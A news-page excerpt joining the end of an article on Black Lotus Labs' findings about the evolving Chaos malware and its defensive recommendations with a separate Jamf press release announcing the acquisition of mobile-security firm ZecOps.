It also propagates in a far different way than previous versions of the malware. While researchers were unable to ascertain its initial access vector, once it takes hold of a system, the latest Chaos variants exploit known vulnerabilities in a way that shows the ability to pivot quickly, the researchers noted.

"Among the samples we analyzed were reported CVEs for Huawei (CVE-2017-17215) and Zyxel (CVE-2022-30525) personal firewalls, both of which leveraged unauthenticated remote command line injection vulnerabilities," they observed in their post. "However, the CVE file appears trivial for the actor to update, and we assess it is highly likely the actor leverages other CVEs."

Chaos has indeed gone through numerous incarnations since it first emerged in June 2021 and this latest version is not likely to be its last, the researchers said. Its first iteration, Chaos Builder 1.0-3.0, purported to be a builder for a .NET version of the Ryuk ransomware, but the researchers soon noticed it bore little resemblance to Ryuk and was actually a wiper.

The malware evolved across several versions until version four of the Chaos builder that was released in late 2021 and got a boost when a threat group named Onyx created its own ransomware. This version quickly became the most common Chaos edition directly observed in the wild, encrypting some files but maintain overwritten and destroying most of the files in its path.

Earlier this year in May, the Chaos builder traded its wiper capabilities for encryption, surfacing with a rebranded binary dubbed Yashma that incorporated fully fledged ransomware capabilities.

While the most recent evolution of Chaos witnessed by Black Lotus Labs is far different, it does have one significant similarity with its predecessors — rapid growth that is unlikely to slow anytime soon, the researchers said.

The earliest certificate of the latest Chaos variant was generated on April 16; this is subsequently when researchers believe threat actors launched the new variant in the wild.

Since then, the number of Chaos self-signed certificates has shown "marked growth," more than doubling in May to 39 and then jumping to 93 for the month of August, the researchers said. As of Sept. 20, the current month has already surpassed the previous month's total with the generation of 94 Chaos certificates, they said.

**Mitigating Risk Across the Board**

Because Chaos is now attacking victims from the smallest home offices to the largest enterprises, researchers made specific recommendations for each type of target.

For those defending networks, they advised that network administrators stay on top of patch management for newly discovered vulnerabilities, as this is a principal way Chaos spreads.

"Use the IoCs outlined in this report to monitor for a Chaos infection, as well as connections to any suspicious infrastructure," the researchers recommended.

Consumers with small office and home office routers should follow best practices of regularly rebooting routers and installing security updates and patches, as well as leveraging properly configured and updated EDR solutions on hosts. These users also should regularly patch software by applying vendors' updates where applicable.

Remote workers — an attack surface that has significantly increased over the last two years of the pandemic — also are at risk, and should mitigate it by changing default passwords and disabling remote root access on machines that don't require it, the researchers recommended. Such workers also should store SSH keys securely and only on devices that require them.

For all businesses, Black Lotus Labs recommends considering the application of comprehensive secure access service edge (SASE) and DDoS mitigation protections to bolster their overall security postures and enable robust detection on network-based communications.

Chaos Malware Resurfaces With All-New DDoS & Cryptomining Modules

ZecOps extends Jamf's mobile security capabilities by adding advanced detections and incident response.

**MINNEAPOLIS, Sept. 26, 2022 (GLOBE NEWSWIRE) —** Jamf (NASDAQ: JAMF), the standard in Apple Enterprise Management, today announced it signed a definitive agreement to acquire ZecOps Inc., a leader in mobile detection and response.

This acquisition uniquely positions Jamf to help IT and security teams strengthen their organization's mobile security posture, accelerating mobile security investigations from weeks to minutes, leverage known indicators of compromise (IOC) at-scale, and identify sophisticated 0- or 1-click attacks on a much deeper scale.

"I am very excited to bring ZecOps' market-leading advanced mobile detection and response capabilities into the Jamf platform," said Dean Hager, CEO, Jamf. "We believe ZecOps has built a differentiated solution that meets a very important need for many organizations — the ability to thoroughly detect and investigate threats that target mobile users so they can confidently use these powerful devices for work. This capability further propels our goal of continuing to bridge the gap between what Apple provides and the enterprise requires."

Mobile devices now account for 59% of global website traffic, and according to the 2022 Verizon Mobile Security Index, close to half (45%) of companies said that they have suffered a compromise involving a mobile device in the past 12 months.

ZecOps will bring important capabilities to the Jamf platform to help address the growing trend of targeted mobile attacks. Jamf offers robust management and mobile security capabilities for iOS devices; however, access to deeper insights into potential security exploits is technically challenging and requires physical access to the device, which is difficult in a remote work environment. ZecOps is a robust, unparalleled solution that provides the deepest layer of insight and assurance for security-conscious customers with high-value targets that need something more. ZecOps provides the same level of visibility currently available for macOS through Jamf Protect but for iOS, making it capable of detecting the kinds of sophisticated mobile threats that Apple's Lockdown mode aims to prevent. With ZecOps, users can have both Lockdown mode and ZecOps software operating at the same time.

**Advanced threat hunting on mobile devices**  
Advanced protection of mobile devices requires a layered approach. Proactive investigation and analysis complement device management and mobile threat defense for more advanced detections and preventative protections. ZecOps enables advanced threat hunting by capturing and analyzing logs from iOS and Android devices at the operating system layer, allowing security operations and incident response teams to perform automatic or on-demand mobile cyber investigations.

**Digital forensics and incident response**  
Security teams are already drowning in data. Event logs, analyst reports, third-party threat intelligence feeds, and more are produced regularly for applications, endpoints, and network infrastructure. Mobile has historically been left out of this data feed. Many investigation teams lack expertise in modern mobile platforms. ZecOps' sophisticated digital forensics capabilities provides Security Operation Center (SOC) teams with unique mobile threat intelligence to uncover zero-day attacks. ZecOps does the heavy lifting for SOC teams, saving months of work per investigation. The solution automatically constructs a timeline of suspicious events and indicators of compromise to demonstrate when and how a device was impacted.

**Privacy conscious**  
Data privacy is extremely important to Jamf. ZecOps shares Jamf's commitment to safeguarding user data by ensuring log collection doesn't include the user's material personal data such as photos, videos, text messages and call logs, and only leveraging low-level system information and diagnostics data to the cloud for analysis. ZecOps analysis can also take place on-premises to meet various organizations' and governments data privacy requirements.

"We founded ZecOps to catch hidden 0-click and 1-click attacks," said Zuk Avraham, co-founder and CEO, ZecOps. "By combining with Jamf, we can offer our customers a truly powerful mobile threat intelligence and threat hunting capabilities that will keep up with the evolving threat landscape without compromising the user experience."

This transaction is subject to the satisfaction of customary closing conditions and is expected to close in the fourth quarter. Terms of the transaction were not disclosed.

**About Jamf**  
Jamf's purpose is to simplify work by helping organizations manage and secure an Apple experience that end users love and organizations trust. Jamf is the only company in the world that provides a complete management and security solution for an Apple-first environment that is enterprise secure, consumer simple and protects personal privacy. To learn more, visit www.jamf.com.

**About ZecOps**  
ZecOps develops the world's most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading enterprises, governments and individuals globally, ZecOps Mobile Detection and Response platform provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes.

**Forward-Looking Statements**  
This release relates to a pending acquisition of ZecOps, Inc. ("ZecOps") by Jamf Holding Corp. ("Jamf", "we", our" or "us"). This release contains forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995, regarding the anticipated benefits of the acquisition, and the anticipated impacts of the acquisition on our business, products, financial results, and other aspects of our and ZecOps' operations. You can identify forward-looking statements by the fact that they do not relate strictly to historical or current facts. These statements may include words such as "anticipate," "estimate," "expect," "project," "plan," "intend," "believe," "may," "will," "should," "can have," "likely," and other words and terms of similar meaning in connection with any discussion of the timing or nature of future operating or financial performance or other events. These risks, uncertainties, assumptions, and other factors include, but are not limited to: the effect of the announcement of the acquisition on the ability of Jamf or ZecOps to retain key personnel or maintain relationships with customers, vendors, developers, community members, and other business partners; risks that the acquisition disrupts current plans and operations; the ability of the parties to consummate the acquisition on a timely basis or at all; the satisfaction of the conditions precedent to consummation of the acquisition; our ability to successfully integrate ZecOps' operations; our and ZecOps' ability to execute on our business strategies relating to the acquisition and realize expected benefits and synergies; and our ability to compete effectively, including in response to actions our competitors may take following announcement of the acquisition. Further information on these and additional risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this release are included under the caption "Forward-Looking Statements" and elsewhere in our Form 10-Q for the quarter ended June 30, 2022, and other filings and reports we make with the Securities and Exchange Commission from time to time. Moreover, both we and ZecOps operate in a very competitive and rapidly changing environment, and new risks may emerge from time to time. It is not possible for us to predict all risks, nor can we assess the impact of all factors on our business or the acquisition, or the extent to which any factor, or combination of factors, may cause actual results or outcomes to differ materially from those contained in any forward-looking statements we may make. Forward-looking statements speak only as of the date the statements are made and are based on information available to us at the time those statements are made and/or our management's good faith belief as of that time with respect to future events. Except as required by law, we undertake no obligation, and do not intend, to update these forward-looking statements.

SOURCE: Jamf

Tag

#intel